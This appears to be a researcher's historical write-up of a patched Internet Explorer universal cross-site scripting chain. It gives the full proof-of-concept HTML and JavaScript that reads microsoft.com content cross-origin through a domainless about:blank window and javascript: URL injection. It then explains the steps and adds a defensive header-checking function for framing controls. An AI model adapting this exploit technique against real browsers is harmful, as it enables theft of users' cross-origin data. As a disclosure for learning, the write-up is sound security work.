This was one of the more involved UXSS chains I worked on. It combined a server-side redirect, a cached ActiveXObject reference, and a “domainless” about:blank window to ultimately execute script inside a cross-origin iframe — reading the contents of microsoft.com from an attacker-controlled page.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDomain_about_blank_full_access</title>
</head>
<body>
<script language="JavaScript">
function main()
{
	var win = window.open("redir.aspx","RANDOM_NAME","width=100,height=100");
	win.setTimeout('opener._ActiveXObject = ActiveXObject;alert("Do not close this alert please");', 100);
	var dhtmlFile = win.eval('new ActiveXObject("htmlFile")');
	setTimeout('openBlankWindow()', 1000);
}

function openBlankWindow()
{
	var blankHtmlFile = new _ActiveXObject("htmlFile");
	var metaredirURL = (location.href.substring(0,location.href.lastIndexOf('/')+1)) + "metaredir.html";
	
	var code = 'w=window.open();' +
	'w.document.write(\'Wait a few seconds please. Loading Microsoft inside an iFrame...<br /><br />' +
	'<script>'+
	'	function injectScript(){'+
	'	window[0][0].location = "javascript:alert(parent.document.body.innerText)";'+
	'	}'+
	'	function loadBlank(){'+
	'	window[0][0].location = "'+ metaredirURL +'";'+
	'	setTimeout("injectScript()", 3000);'+
	'	}'+
	'<\/script>'+
	'<iframe onload="loadBlank()" width=400 height=200 src="http://www.microsoft.com"></iframe>\');'+
	'w.document.close()';

	blankHtmlFile.parentWindow.setTimeout(code);
}
</script>
</body>
</html>

The chain worked in four steps. First, a new window was opened to a redirecting page (redir.aspx), and before the redirect fired, a reference to its ActiveXObject constructor was cached. Second, after the redirect, the cached reference was used to create a “domainless” htmlFile — one whose parentWindow.open() produced an about:blank with no tied origin, similar to a blank tab opened directly by the browser. Third, that domainless window loaded microsoft.com in an iframe. Fourth, a sub-iframe inside microsoft.com was navigated to metaredir.html (a meta-refresh to about:blank); because the about:blank inherited microsoft.com’s origin, the domainless outer window could access it via window[0][0].location and inject a javascript: URL that read the cross-origin document content.
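Step three of this chain depends on the victim site being frameable by a cross-origin page at all, so here is an added example (not code from the original write-up) that checks a response's headers for the two controls that now govern that: X-Frame-Options and CSP frame-ancestors. All origins and header sets in it are constructed; it addresses the framing step of this particular chain, not the underlying browser bug.

```javascript
// Added example (not from the original write-up): can a cross-origin page frame this
// response? That framing is the precondition for step three above. Rule applied: a CSP
// frame-ancestors directive overrides X-Frame-Options; otherwise DENY/SAMEORIGIN block
// cross-origin framing. All origins and header sets here are constructed, not captured.
function frameAncestorsLists(headers) { // one list per frame-ancestors directive; several CSP headers may exist
  const lists = [];
  for (const [name, value] of headers) {
    if (name.toLowerCase() !== 'content-security-policy') continue;
    for (const directive of value.split(';')) {
      const tokens = directive.trim().split(/\s+/);
      if (tokens[0].toLowerCase() === 'frame-ancestors') lists.push(tokens.slice(1).map(t => t.toLowerCase()));
    }
  }
  return lists;
}
// Matches 'none', 'self', '*', scheme-source, and host-source with a "*." wildcard and optional port.
function sourceListAllows(tokens, documentOrigin, embedderOrigin) {
  if (tokens.length === 0 || tokens.includes("'none'")) return false;
  const emb = new URL(embedderOrigin);
  const embPort = emb.port || (emb.protocol === 'https:' ? '443' : '80');
  return tokens.some(t => {
    if (t === "'self'") return embedderOrigin === documentOrigin;
    if (t === '*') return true;
    if (/^[a-z][a-z0-9+.-]*:$/.test(t)) return emb.protocol === t;   // scheme-source such as https:
    const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:*]+)(?::(\d+|\*))?$/.exec(t);
    if (!m) return false;
    const [, scheme, wild, host, port] = m;
    if (scheme && scheme + ':' !== emb.protocol) return false;
    const hostOk = wild ? emb.hostname.endsWith('.' + host) : emb.hostname === host;
    return hostOk && (!port || port === '*' || port === embPort);
  });
}
// True when embedderOrigin may load the document in an iframe.
function crossOriginFramingAllowed(headers, documentOrigin, embedderOrigin) {
  const lists = frameAncestorsLists(headers);
  if (lists.length > 0) return lists.every(l => sourceListAllows(l, documentOrigin, embedderOrigin)); // every policy must allow it
  const xfo = headers.filter(([n]) => n.toLowerCase() === 'x-frame-options').map(([, v]) => v.trim().toUpperCase());
  if (xfo.length === 0) return true;                              // nothing forbids framing
  if (new Set(xfo).size > 1 || xfo[0] === 'DENY') return false;   // conflicting values are treated as DENY
  if (xfo[0] === 'SAMEORIGIN') return embedderOrigin === documentOrigin;
  return true;                                                    // unrecognised values are ignored
}
// Constructed header sets covering the cases a reviewer would check.
const SAMPLE_RESPONSES = {
  unprotected: [['Content-Type', 'text/html']],
  xfoDeny: [['X-Frame-Options', 'DENY']],
  xfoSameOrigin: [['X-Frame-Options', 'SAMEORIGIN']],
  cspPartners: [['Content-Security-Policy', "default-src 'self'; frame-ancestors 'self' https://*.partner.example"]],
  cspOverridesXfo: [['X-Frame-Options', 'DENY'], ['Content-Security-Policy', 'frame-ancestors *']],
};
```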

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.